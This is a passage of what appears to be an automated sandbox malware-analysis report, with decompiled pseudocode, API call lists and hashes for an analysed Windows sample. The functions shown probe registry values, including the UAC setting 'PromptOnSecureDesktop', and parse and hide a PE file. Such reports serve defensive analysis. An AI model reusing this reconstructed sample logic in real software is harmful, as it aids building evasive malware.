                                                                                							if(E00406CAD(_v8) == 0) {
                                                                                								 *_t192 = 0x2e;
                                                                                								goto L38;
                                                                                							} else {
                                                                                								_t194 = E0040F1A5(_v8) ^ 0x61616161;
                                                                                								_t163 = _t194 >> 0x00000008 & 0x000000ff;
                                                                                								 *_v28 = 0x2e;
                                                                                								if(E00406C96(_t194) != 0) {
                                                                                									L37:
                                                                                									_t160 = 0xe4;
                                                                                									L38:
                                                                                									_t188 = 0;
                                                                                									goto L39;
                                                                                								}
                                                                                								_t56 = _t163 - 0x51; // -81
                                                                                								if(_t56 > 0x2e || (_t194 & 0x000000ff) >= 0x10) {
                                                                                									goto L37;
                                                                                								} else {
                                                                                									_t196 = 0;
                                                                                									if(GetFileAttributesExA( &_v296, 0,  &_v592) != 0) {
                                                                                										_t196 = 1;
                                                                                									}
                                                                                									_t146 = _a8;
                                                                                									if(_t146 != 0) {
                                                                                										 *_t146 = _t163;
                                                                                									}
                                                                                									_t164 = _a16;
                                                                                									if(_t164 != 0) {
                                                                                										_t202 = _v8 -  &_v296;
                                                                                										E0040EE08(_t164,  &_v296, _t202);
                                                                                										 *((char*)(_t202 + _t164)) = 0;
                                                                                									}
                                                                                									if(_a20 != 0) {
                                                                                										E0040EF00(_a20, _v8);
                                                                                									}
                                                                                									_t147 = _a12;
                                                                                									if(_t147 != 0) {
                                                                                										 *_t147 = _t196;
                                                                                									}
                                                                                									_push(3);
                                                                                									_pop(0);
                                                                                									goto L63;
                                                                                								}
                                                                                							}
                                                                                						} else {
                                                                                							E0040EF00(_a16,  &_v556);
                                                                                							L63:
                                                                                							RegCloseKey(_v12);
                                                                                							goto L64;
                                                                                						}
                                                                                					}
                                                                                					_t93 = RegCloseKey(_v20); // executed
                                                                                					L66:
                                                                                					return _t93 | 0xffffffff;
                                                                                				}
                                                                                			}

                                                                                APIs
                                                                                • RegOpenKeyExA.KERNELBASE(80000002,00000000,00020119,00000000,?,74CB43E0,00000000), ref: 00407472
                                                                                • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00000101,?,?,?,?,?,?,?,74CB43E0,00000000), ref: 004074F0
                                                                                • RegQueryValueExA.ADVAPI32(?,00000000,?,00000000,?,?,00000104,?,?,?,?,?,?,74CB43E0,00000000), ref: 00407528
                                                                                • ___ascii_stricmp.LIBCMT ref: 0040764D
                                                                                • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,74CB43E0,00000000), ref: 004076E7
                                                                                • RegEnumKeyA.ADVAPI32(00000000,00000000,?,00000104), ref: 00407706
                                                                                • RegCloseKey.KERNELBASE(00000000,?,?,?,?,?,?,74CB43E0,00000000), ref: 00407717
                                                                                • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,74CB43E0,00000000), ref: 00407745
                                                                                • RegCloseKey.ADVAPI32(00000000,?,?,?,?,?,?,74CB43E0,00000000), ref: 004077EF
                                                                                  • Part of subcall function 0040F1A5: lstrlenA.KERNEL32(000000C8,000000E4,PromptOnSecureDesktop,000000C8,00407150,?), ref: 0040F1AD
                                                                                • GetFileAttributesExA.KERNEL32(00000022,00000000,?), ref: 0040778F
                                                                                • RegCloseKey.ADVAPI32(?), ref: 004077E6
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.289443639.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.289443639.0000000000414000.00000040.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Close$Open$AttributesEnumFileQueryValue___ascii_stricmplstrlen
                                                                                • String ID: "$PromptOnSecureDesktop
                                                                                • API String ID: 3433985886-3108538426
                                                                                • Opcode ID: be1730cef161fe20a2692bf5d8dfd6f9750a488cf0ac433aa7dcf1ab0d83bb1b
                                                                                • Instruction ID: 7fe5a339a68ccf6b09c70fd716338511db9c3a0a85de510e5ec7ef93542d7acc
                                                                                • Opcode Fuzzy Hash: be1730cef161fe20a2692bf5d8dfd6f9750a488cf0ac433aa7dcf1ab0d83bb1b
                                                                                • Instruction Fuzzy Hash: 10C1F171D04209ABEB119BA5DC45BEF7BB9EF04310F1044B7F504B72D1EA78AE908B69
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 68%
                                                                                			E0040704C(intOrPtr _a4, int _a8, int _a12, int _a16, int* _a20) {
                                                                                				CHAR* _v8;
                                                                                				void* _v12;
                                                                                				char _v16;
                                                                                				int _v20;
                                                                                				char _v24;
                                                                                				char _v28;
                                                                                				signed int _v32;
                                                                                				char _v64;
                                                                                				char _v363;
                                                                                				char _v364;
                                                                                				void _v400;
                                                                                				intOrPtr* _t88;
                                                                                				int* _t89;
                                                                                				int* _t90;
                                                                                				int* _t91;
                                                                                				char* _t93;
                                                                                				long _t94;
                                                                                				signed int _t96;
                                                                                				signed int _t97;
                                                                                				long _t99;
                                                                                				signed int _t107;
                                                                                				int _t109;
                                                                                				int _t119;
                                                                                				int _t121;
                                                                                				int _t122;
                                                                                				int _t123;
                                                                                				signed int _t125;
                                                                                				int _t130;
                                                                                				int _t136;
                                                                                				int _t149;
                                                                                				int _t155;
                                                                                				void* _t158;
                                                                                				void* _t166;
                                                                                				int _t196;
                                                                                				int _t202;
                                                                                				void* _t203;
                                                                                				void* _t204;
                                                                                				void* _t206;
                                                                                				void* _t207;
                                                                                
                                                                                				_t88 = _a8;
                                                                                				_t167 = 0;
                                                                                				_v16 = 0x12c;
                                                                                				_v24 = 0x20;
                                                                                				_v364 = 0;
                                                                                				if(_t88 != 0) {
                                                                                					 *_t88 = 0;
                                                                                				}
                                                                                				_t89 = _a12;
                                                                                				if(_t89 != _t167) {
                                                                                					 *_t89 = _t167;
                                                                                				}
                                                                                				_t90 = _a16;
                                                                                				if(_t90 != _t167) {
                                                                                					 *_t90 = _t167;
                                                                                				}
                                                                                				_t91 = _a20;
                                                                                				if(_t91 != _t167) {
                                                                                					 *_t91 = _t167;
                                                                                				}
                                                                                				_t93 = E00402544(0x4122f8,  &E004106AC, 0x2e, 0xe4, 0xc8);
                                                                                				_t204 = _t203 + 0x14;
                                                                                				_t94 = RegOpenKeyExA(0x80000001, _t93, _t167, 0x101,  &_v12); // executed
                                                                                				if(_t94 != 0) {
                                                                                					L21:
                                                                                					_t96 = E0040EE2A(_t167, 0x4122f8, 0, 0x100) | 0xffffffff;
                                                                                					goto L22;
                                                                                				} else {
                                                                                					_t97 = E00406DC2(_t167);
                                                                                					_push( &_v16);
                                                                                					_push( &_v364);
                                                                                					_push( &_v28);
                                                                                					_v32 = _t97;
                                                                                					_push(0);
                                                                                					_push( &_v24);
                                                                                					_t167 =  &_v64;
                                                                                					_push( &_v64);
                                                                                					_v8 = 0;
                                                                                					_push(0);
                                                                                					while(1) {
                                                                                						_t99 = RegEnumValueA(_v12, ??, ??, ??, ??, ??, ??, ??); // executed
                                                                                						if(_t99 == 0x103) {
                                                                                							break;
                                                                                						}
                                                                                						__eflags = _t99;
                                                                                						if(_t99 != 0) {
                                                                                							L18:
                                                                                							_t25 =  &_v8;
                                                                                							 *_t25 =  &(_v8[1]);
                                                                                							__eflags =  *_t25;
                                                                                							_push( &_v16);
                                                                                							_push( &_v364);
                                                                                							_push( &_v28);
                                                                                							_push(0);
                                                                                							_push( &_v24);
                                                                                							_push( &_v64);
                                                                                							_push(_v8);
                                                                                							_v16 = 0x12c;
                                                                                							_v24 = 0x20;
                                                                                							continue;
                                                                                						}
                                                                                						__eflags = _v24 - _t99;
                                                                                						if(_v24 <= _t99) {
                                                                                							goto L18;
                                                                                						}
                                                                                						__eflags = _v16 - _t99;
                                                                                						if(_v16 <= _t99) {
                                                                                							goto L18;
                                                                                						}
                                                                                						__eflags = _v28 - 1;
                                                                                						if(_v28 != 1) {
                                                                                							goto L18;
                                                                                						}
                                                                                						_t107 = E0040EED1( &_v64, E00402544(0x4122f8,  &E004106A0, 9, 0xe4, 0xc8));
                                                                                						_t206 = _t204 + 0x1c;
                                                                                						asm("sbb eax, eax");
                                                                                						_t109 =  ~_t107 + 1;
                                                                                						__eflags = _t109;
                                                                                						_v20 = _t109;
                                                                                						if(_t109 != 0) {
                                                                                							L23:
                                                                                							_v8 = E0040EE95( &_v364, E00402544(0x4122f8,  &E0041069C, 4, 0xe4, 0xc8));
                                                                                							E0040EE2A(_t167, 0x4122f8, 0, 0x100);
                                                                                							_t207 = _t206 + 0x28;
                                                                                							__eflags = _v8;
                                                                                							if(_v8 == 0) {
                                                                                								__eflags = _v364 - 0x22;
                                                                                								if(_v364 == 0x22) {
                                                                                									E0040EF00( &_v364,  &_v363);
                                                                                									_t149 = E0040ED23( &_v364, 0x22);
                                                                                									_t207 = _t207 + 0x10;
                                                                                									__eflags = _t149;
                                                                                									if(_t149 != 0) {
                                                                                										 *_t149 = 0;
                                                                                									}
                                                                                								}
                                                                                								_t196 = E0040EE95( &_v364, E00402544(0x4122f8, 0x410694, 5, 0xe4, 0xc8));
                                                                                								E0040EE2A(_t167, 0x4122f8, 0, 0x100);
                                                                                								__eflags = _t196;
                                                                                								if(_t196 != 0) {
                                                                                									_t119 = E0040ED77( &_v364, _a4);
                                                                                									__eflags = _t119;
                                                                                									if(_t119 != 0) {
                                                                                										 *_t196 = 0;
                                                                                										_t121 = E0040ED23( &_v364, 0x5c);
                                                                                										_v8 = _t121;
                                                                                										__eflags = _t121;
                                                                                										if(_t121 != 0) {
                                                                                											_t63 =  &_v8;
                                                                                											 *_t63 =  &(_v8[1]);
                                                                                											__eflags =  *_t63;
                                                                                										} else {
                                                                                											_v8 =  &_v364;
                                                                                										}
                                                                                										_t122 = E00406CAD(_v8);
                                                                                										__eflags = _t122;
                                                                                										if(_t122 != 0) {
                                                                                											asm("popad");
                                                                                											asm("popad");
                                                                                											asm("popad");
                                                                                											asm("popad");
                                                                                											_push(0x8b00007e);
                                                                                											asm("lock xor esi, 0x55555555");
                                                                                											_v16 = 0x4122f8;
                                                                                											_t166 = 0xad;
                                                                                											_t123 = E00406C96(0x4122f8);
                                                                                											__eflags = _t123;
                                                                                											if(_t123 != 0) {
                                                                                												L57:
                                                                                												RegCloseKey(_v12);
                                                                                												__eflags = _a16;
                                                                                												if(_a16 != 0) {
                                                                                													E0040EF00(_a16,  &_v64);
                                                                                												}
                                                                                												_t125 = 0;
                                                                                												__eflags = _v20;
                                                                                												 *_t196 = 0x2e;
                                                                                												goto L34;
                                                                                											}
                                                                                											__eflags = 0x6d - 0x3f;
                                                                                											if(0x6d > 0x3f) {
                                                                                												goto L57;
                                                                                											}
                                                                                											__eflags = 0xf8 - 0x10;
                                                                                											if(0xf8 >= 0x10) {
                                                                                												goto L57;
                                                                                											}
                                                                                											_t202 = _a12;
                                                                                											 *_t196 = 0x2e;
                                                                                											__eflags = _t202;
                                                                                											if(_t202 != 0) {
                                                                                												_t136 = GetFileAttributesExA( &_v364, 0,  &_v400);
                                                                                												__eflags = _t136;
                                                                                												if(_t136 != 0) {
                                                                                													 *_t202 = 1;
                                                                                												}
                                                                                											}
                                                                                											_t130 = _a8;
                                                                                											__eflags = _t130;
                                                                                											if(_t130 != 0) {
                                                                                												 *_t130 = _t166;
                                                                                											}
                                                                                											__eflags = _a16;
                                                                                											if(_a16 != 0) {
                                                                                												E0040EF00(_a16,  &_v64);
                                                                                											}
                                                                                											__eflags = _a20;
                                                                                											if(_a20 != 0) {
                                                                                												E0040EF00(_a20, _v8);
                                                                                											}
                                                                                											_t125 = 0;
                                                                                											__eflags = _v20;
                                                                                											goto L34;
                                                                                										} else {
                                                                                											RegCloseKey(_v12);
                                                                                											__eflags = _a16;
                                                                                											if(_a16 != 0) {
                                                                                												E0040EF00(_a16,  &_v64);
                                                                                											}
                                                                                											 *_t196 = 0x2e;
                                                                                											goto L33;
                                                                                										}
                                                                                									}
                                                                                									RegCloseKey(_v12);
                                                                                									_t96 = 0;
                                                                                									goto L22;
                                                                                								} else {
                                                                                									RegCloseKey(_v12);
                                                                                									__eflags = _a16;
                                                                                									if(_a16 != 0) {
                                                                                										E0040EF00(_a16,  &_v64);
                                                                                									}
                                                                                									L33:
                                                                                									_t125 = 0;
                                                                                									__eflags = _v20;
                                                                                									L34:
                                                                                									_t96 = (_t125 & 0xffffff00 | __eflags == 0x00000000) + 1;
                                                                                									L22:
                                                                                									return _t96;
                                                                                								}
                                                                                							}
                                                                                							RegCloseKey(_v12);
                                                                                							__eflags = _a16;
                                                                                							if(_a16 != 0) {
                                                                                								E0040EF00(_a16,  &_v64);
                                                                                							}
                                                                                							_t96 = 1;
                                                                                							goto L22;
                                                                                						}
                                                                                						_t155 = E00406CAD( &_v64);
                                                                                						_pop(_t167);
                                                                                						__eflags = _t155;
                                                                                						if(_t155 == 0) {
                                                                                							L17:
                                                                                							E0040EE2A(_t167, 0x4122f8, 0, 0x100);
                                                                                							_t204 = _t206 + 0xc;
                                                                                							goto L18;
                                                                                						}
                                                                                						_t158 = E0040F1A5( &_v64);
                                                                                						_t167 = _v32 ^ 0x61616161;
                                                                                						__eflags = _t158 - (_v32 ^ 0x61616161);
                                                                                						if(_t158 == (_v32 ^ 0x61616161)) {
                                                                                							goto L23;
                                                                                						}
                                                                                						goto L17;
                                                                                					}
                                                                                					RegCloseKey(_v12); // executed
                                                                                					goto L21;
                                                                                				}
                                                                                			}
                                                                                0x00407354
                                                                                0x0040735b
                                                                                0x0040735d
                                                                                0x004073d5
                                                                                0x004073d8
                                                                                0x004073de
                                                                                0x004073e2
                                                                                0x004073eb
                                                                                0x004073f1
                                                                                0x004073f2
                                                                                0x004073f4
                                                                                0x004073f7
                                                                                0x00000000
                                                                                0x004073f7
                                                                                0x00407362
                                                                                0x00407365
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040736d
                                                                                0x00407370
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00407372
                                                                                0x00407375
                                                                                0x0040737a
                                                                                0x0040737c
                                                                                0x0040738d
                                                                                0x00407393
                                                                                0x00407395
                                                                                0x00407397
                                                                                0x00407397
                                                                                0x00407395
                                                                                0x0040739d
                                                                                0x004073a0
                                                                                0x004073a2
                                                                                0x004073a4
                                                                                0x004073a4
                                                                                0x004073a6
                                                                                0x004073a9
                                                                                0x004073b2
                                                                                0x004073b8
                                                                                0x004073b9
                                                                                0x004073bc
                                                                                0x004073c4
                                                                                0x004073ca
                                                                                0x004073cb
                                                                                0x004073cd
                                                                                0x00000000
                                                                                0x00407311
                                                                                0x00407314
                                                                                0x0040731a
                                                                                0x0040731d
                                                                                0x00407326
                                                                                0x0040732c
                                                                                0x0040732d
                                                                                0x00000000
                                                                                0x0040732d
                                                                                0x0040730f
                                                                                0x004072d0
                                                                                0x004072d6
                                                                                0x00000000
                                                                                0x0040728e
                                                                                0x00407291
                                                                                0x00407297
                                                                                0x0040729a
                                                                                0x004072a3
                                                                                0x004072a9
                                                                                0x004072aa
                                                                                0x004072aa
                                                                                0x004072ac
                                                                                0x004072af
                                                                                0x004072b2
                                                                                0x004071cb
                                                                                0x004071cf
                                                                                0x004071cf
                                                                                0x0040728c
                                                                                0x00407208
                                                                                0x0040720e
                                                                                0x00407212
                                                                                0x0040721b
                                                                                0x00407221
                                                                                0x00407224
                                                                                0x00000000
                                                                                0x00407224
                                                                                0x0040713d
                                                                                0x00407142
                                                                                0x00407143
                                                                                0x00407145
                                                                                0x0040715e
                                                                                0x00407166
                                                                                0x0040716b
                                                                                0x00000000
                                                                                0x0040716b
                                                                                0x0040714b
                                                                                0x00407154
                                                                                0x0040715a
                                                                                0x0040715c
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040715c
                                                                                0x004071b2
                                                                                0x00000000
                                                                                0x004071b2

                                                                                APIs
                                                                                • RegOpenKeyExA.KERNELBASE(80000001,00000000,00000101,74CB43E0,?,74CB43E0,00000000), ref: 004070C2
                                                                                • RegEnumValueA.KERNELBASE(74CB43E0,00000000,?,00000020,00000000,00000000,00000000,0000012C,?,74CB43E0,00000000), ref: 0040719E
                                                                                • RegCloseKey.KERNELBASE(74CB43E0,?,74CB43E0,00000000), ref: 004071B2
                                                                                • RegCloseKey.ADVAPI32(74CB43E0), ref: 00407208
                                                                                • RegCloseKey.ADVAPI32(74CB43E0), ref: 00407291
                                                                                • ___ascii_stricmp.LIBCMT ref: 004072C2
                                                                                • RegCloseKey.ADVAPI32(74CB43E0), ref: 004072D0
                                                                                • RegCloseKey.ADVAPI32(74CB43E0), ref: 00407314
                                                                                • GetFileAttributesExA.KERNEL32(00000022,00000000,?), ref: 0040738D
                                                                                • RegCloseKey.ADVAPI32(74CB43E0), ref: 004073D8
                                                                                  • Part of subcall function 0040F1A5: lstrlenA.KERNEL32(000000C8,000000E4,PromptOnSecureDesktop,000000C8,00407150,?), ref: 0040F1AD
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.289443639.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.289443639.0000000000414000.00000040.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Close$AttributesEnumFileOpenValue___ascii_stricmplstrlen
                                                                                • String ID: $"$PromptOnSecureDesktop
                                                                                • API String ID: 4293430545-98143240
                                                                                • Opcode ID: df9fb8698735da703c9513efeb9e5005b2c7850a4ce7d3985355b06bc3c585b2
                                                                                • Instruction ID: 42610d5d4912e138811464987e42a56107d9bf2f6382ea6b9d81aa24fc4965e2
                                                                                • Opcode Fuzzy Hash: df9fb8698735da703c9513efeb9e5005b2c7850a4ce7d3985355b06bc3c585b2
                                                                                • Instruction Fuzzy Hash: B5B17071D08209BAEB159FA1DC45BEF77B8AB04304F20047BF501F61D1EB79AA94CB69
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 576 40675c-406778 577 406784-4067a2 CreateFileA 576->577 578 40677a-40677e SetFileAttributesA 576->578 579 4067a4-4067b2 CreateFileA 577->579 580 4067b5-4067b8 577->580 578->577 579->580 581 4067c5-4067c9 580->581 582 4067ba-4067bf SetFileAttributesA 580->582 583 406977-406986 581->583 584 4067cf-4067df GetFileSize 581->584 582->581 585 4067e5-4067e7 584->585 586 40696b 584->586 585->586 588 4067ed-40680b ReadFile 585->588 587 40696e-406971 FindCloseChangeNotification 586->587 587->583 588->586 589 406811-406824 SetFilePointer 588->589 589->586 590 40682a-406842 ReadFile 589->590 590->586 591 406848-406861 SetFilePointer 590->591 591->586 592 406867-406876 591->592 593 4068d5-4068df 592->593 594 406878-40688f ReadFile 592->594 593->587 595 4068e5-4068eb 593->595 596 406891-40689e 594->596 597 4068d2 594->597 598 4068f0-4068fe call 40ebcc 595->598 599 4068ed 595->599 600 4068a0-4068b5 596->600 601 4068b7-4068ba 596->601 597->593 598->586 608 406900-40690b SetFilePointer 598->608 599->598 602 4068bd-4068c3 600->602 601->602 604 4068c5 602->604 605 4068c8-4068ce 602->605 604->605 605->594 607 4068d0 605->607 607->593 609 40695a-406969 call 40ec2e 608->609 610 40690d-406920 ReadFile 608->610 609->587 610->609 611 406922-406958 610->611 611->587
                                                                                C-Code - Quality: 100%
                                                                                			E0040675C(CHAR* _a4, long* _a8, long _a12) {
                                                                                				long _v8;
                                                                                				void* _v12;
                                                                                				struct _OVERLAPPED* _v16;
                                                                                				long _v20;
                                                                                				struct _OVERLAPPED* _v24;
                                                                                				long _v28;
                                                                                				intOrPtr _v48;
                                                                                				intOrPtr _v52;
                                                                                				intOrPtr _v60;
                                                                                				void _v68;
                                                                                				long _v72;
                                                                                				void _v132;
                                                                                				intOrPtr _v320;
                                                                                				signed int _v360;
                                                                                				signed int _v374;
                                                                                				void _v380;
                                                                                				void* _t85;
                                                                                				long _t88;
                                                                                				int _t92;
                                                                                				long _t93;
                                                                                				int _t96;
                                                                                				long _t99;
                                                                                				long _t102;
                                                                                				struct _OVERLAPPED* _t103;
                                                                                				long _t104;
                                                                                				long _t115;
                                                                                				long _t120;
                                                                                				signed int _t143;
                                                                                				void* _t146;
                                                                                
                                                                                				_v16 = 0;
                                                                                				_v8 = 0;
                                                                                				if(_a12 != 0) {
                                                                                					SetFileAttributesA(_a4, 0x80);
                                                                                				}
                                                                                				_t85 = CreateFileA(_a4, 0x80000000, 3, 0, 3, 0x80, 0); // executed
                                                                                				_v12 = _t85;
                                                                                				if(_t85 == 0xffffffff) {
                                                                                					_v12 = CreateFileA(_a4, 0x80000000, 3, 0, 3, 4, 0);
                                                                                				}
                                                                                				if(_a12 != 0) {
                                                                                					SetFileAttributesA(_a4, 2);
                                                                                				}
                                                                                				if(_v12 != 0xffffffff) {
                                                                                					_t88 = GetFileSize(_v12, 0);
                                                                                					_v8 = _t88;
                                                                                					if(_t88 == 0xffffffff || _t88 == 0) {
                                                                                						L31:
                                                                                						_v8 = 0;
                                                                                					} else {
                                                                                						_a12 = 0;
                                                                                						_v28 = 0;
                                                                                						_t92 = ReadFile(_v12,  &_v132, 0x40,  &_a12, 0); // executed
                                                                                						if(_t92 == 0) {
                                                                                							goto L31;
                                                                                						} else {
                                                                                							_t93 = SetFilePointer(_v12, _v72, 0, 0); // executed
                                                                                							if(_t93 == 0xffffffff) {
                                                                                								goto L31;
                                                                                							} else {
                                                                                								_t96 = ReadFile(_v12,  &_v380, 0xf8,  &_v28, 0); // executed
                                                                                								if(_t96 == 0) {
                                                                                									goto L31;
                                                                                								} else {
                                                                                									_t99 = SetFilePointer(_v12, (_v360 & 0x0000ffff) + _v72 + 0x18, 0, 0); // executed
                                                                                									if(_t99 == 0xffffffff) {
                                                                                										goto L31;
                                                                                									} else {
                                                                                										_v20 = 0;
                                                                                										_v24 = 0;
                                                                                										if(0 < _v374) {
                                                                                											while(1) {
                                                                                												_t115 = 0x28;
                                                                                												_a12 = _t115;
                                                                                												if(ReadFile(_v12,  &_v68, _t115,  &_a12, 0) == 0) {
                                                                                													break;
                                                                                												}
                                                                                												_t143 = _v374 & 0x0000ffff;
                                                                                												if(_v24 != _t143 - 1) {
                                                                                													_t120 = _v48 + _v52;
                                                                                												} else {
                                                                                													_t120 = (_v320 + _v60 - 0x00000001 &  !(_v320 - 1)) + _v48;
                                                                                												}
                                                                                												_a12 = _t120;
                                                                                												if(_v20 < _t120) {
                                                                                													_v20 = _t120;
                                                                                												}
                                                                                												_v24 = _v24 + 1;
                                                                                												if(_v24 < _t143) {
                                                                                													continue;
                                                                                												} else {
                                                                                												}
                                                                                												goto L23;
                                                                                											}
                                                                                											_v8 = 0;
                                                                                										}
                                                                                										L23:
                                                                                										if(_v24 >= (_v374 & 0x0000ffff)) {
                                                                                											_t102 = _v20;
                                                                                											if(_v8 > _t102) {
                                                                                												_v8 = _t102;
                                                                                											}
                                                                                											_t103 = E0040EBCC(_v8);
                                                                                											_v16 = _t103;
                                                                                											if(_t103 == 0) {
                                                                                												goto L31;
                                                                                											} else {
                                                                                												_t104 = SetFilePointer(_v12, 0, 0, 0); // executed
                                                                                												if(_t104 == 0xffffffff) {
                                                                                													L30:
                                                                                													_v8 = 0;
                                                                                													E0040EC2E(_v16);
                                                                                													_v16 = 0;
                                                                                												} else {
                                                                                													_t146 = _v16;
                                                                                													if(ReadFile(_v12, _t146, _v8,  &_v20, 0) == 0) {
                                                                                														goto L30;
                                                                                													} else {
                                                                                														 *(((_v374 & 0x0000ffff) - 1) * 0x28 + (_v360 & 0x0000ffff) + _v72 + _t146 + 0x18 + 0x10) =  *((intOrPtr*)(((_v374 & 0x0000ffff) - 1) * 0x28 + (_v360 & 0x0000ffff) + _v72 + _t146 + 0x18 + 8)) + _v320 - 0x00000001 &  !(_v320 - 1);
                                                                                														_v8 = _v20;
                                                                                													}
                                                                                												}
                                                                                											}
                                                                                										}
                                                                                									}
                                                                                								}
                                                                                							}
                                                                                						}
                                                                                					}
                                                                                					FindCloseChangeNotification(_v12); // executed
                                                                                				}
                                                                                				 *_a8 = _v8;
                                                                                				return _v16;
                                                                                			}
                                                                                Instruction addresses (decompiler line-to-address column, shown here as one list): 0x0040676a, 0x0040676d, 0x00406778, 0x0040677e, 0x0040677e, 0x0040679a, 0x0040679c, 0x004067a2, 0x004067b2, 0x004067b2, 0x004067b8, 0x004067bf, 0x004067bf, 0x004067c9, 0x004067d3, 0x004067d9, 0x004067df, 0x0040696b, 0x0040696b, 0x004067ed, 0x00406801, 0x00406804, 0x00406807, 0x0040680b, 0x00000000, 0x00406811, 0x0040681f, 0x00406824, 0x00000000, 0x0040682a, 0x0040683e, 0x00406842, 0x00000000, 0x00406848, 0x0040685c, 0x00406861, 0x00000000, 0x00406867, 0x00406869, 0x0040686c, 0x00406876, 0x00406878, 0x0040687a, 0x00406881, 0x0040688f, 0x00000000, 0x00000000, 0x00406891, 0x0040689e, 0x004068ba, 0x004068a0, 0x004068b2, 0x004068b2, 0x004068bd, 0x004068c3, 0x004068c5, 0x004068c5, 0x004068c8, 0x004068ce, 0x00000000, 0x00000000, 0x004068d0, 0x00000000, 0x004068ce, 0x004068d2, 0x004068d2, 0x004068d5, 0x004068df, 0x004068e5, 0x004068eb, 0x004068ed, 0x004068ed, 0x004068f3, 0x004068f9, 0x004068fe, 0x00000000, 0x00406900, 0x00406906, 0x0040690b, 0x0040695a, 0x0040695d, 0x00406960, 0x00406966, 0x0040690d, 0x0040690d, 0x00406920, 0x00000000, 0x00406922, 0x0040694f, 0x00406955, 0x00406955, 0x00406920, 0x0040690b, 0x004068fe, 0x004068df, 0x00406861, 0x00406842, 0x00406824, 0x0040680b, 0x00406971, 0x00406971, 0x0040697f, 0x00406986

                                                                                APIs
                                                                                • SetFileAttributesA.KERNEL32(?,00000080,?,74CB43E0,00000000), ref: 0040677E
                                                                                • CreateFileA.KERNELBASE(?,80000000,00000003,00000000,00000003,00000080,00000000,?,74CB43E0,00000000), ref: 0040679A
                                                                                • CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000004,00000000,?,74CB43E0,00000000), ref: 004067B0
                                                                                • SetFileAttributesA.KERNEL32(?,00000002,?,74CB43E0,00000000), ref: 004067BF
                                                                                • GetFileSize.KERNEL32(000000FF,00000000,?,74CB43E0,00000000), ref: 004067D3
                                                                                • ReadFile.KERNELBASE(000000FF,?,00000040,00408244,00000000,?,74CB43E0,00000000), ref: 00406807
                                                                                • SetFilePointer.KERNELBASE(000000FF,?,00000000,00000000,?,74CB43E0,00000000), ref: 0040681F
                                                                                • ReadFile.KERNELBASE(000000FF,?,000000F8,?,00000000,?,74CB43E0,00000000), ref: 0040683E
                                                                                • SetFilePointer.KERNELBASE(000000FF,?,00000000,00000000,?,74CB43E0,00000000), ref: 0040685C
                                                                                • ReadFile.KERNEL32(000000FF,?,00000028,00408244,00000000,?,74CB43E0,00000000), ref: 0040688B
                                                                                • SetFilePointer.KERNELBASE(000000FF,00000000,00000000,00000000,?,74CB43E0,00000000), ref: 00406906
                                                                                • ReadFile.KERNEL32(000000FF,004121A8,00000000,00408244,00000000,?,74CB43E0,00000000), ref: 0040691C
                                                                                • FindCloseChangeNotification.KERNELBASE(000000FF,?,74CB43E0,00000000), ref: 00406971
                                                                                  • Part of subcall function 0040EC2E: GetProcessHeap.KERNEL32(00000000,'@,00000000,0040EA27,00000000), ref: 0040EC41
                                                                                  • Part of subcall function 0040EC2E: HeapFree.KERNEL32(00000000), ref: 0040EC48
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.289443639.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.289443639.0000000000414000.00000040.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: File$Read$Pointer$AttributesCreateHeap$ChangeCloseFindFreeNotificationProcessSize
                                                                                • String ID:
                                                                                • API String ID: 1400801100-0
                                                                                • Opcode ID: d05b9ef8185a7d6987771a176bb27021890da5eba797bb42cdabcd388c34deb0
                                                                                • Instruction ID: 23622665348289c9bdc7ba1e7bdf6275147e3319f3664adf7917ee5564634b96
                                                                                • Opcode Fuzzy Hash: d05b9ef8185a7d6987771a176bb27021890da5eba797bb42cdabcd388c34deb0
                                                                                • Instruction Fuzzy Hash: E47109B1D00219EFDB109FA5CC809EEBBB9FB04314F11457AF516B6290E7349EA2DB54
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Control-flow Graph (legend: Executed / Not Executed)
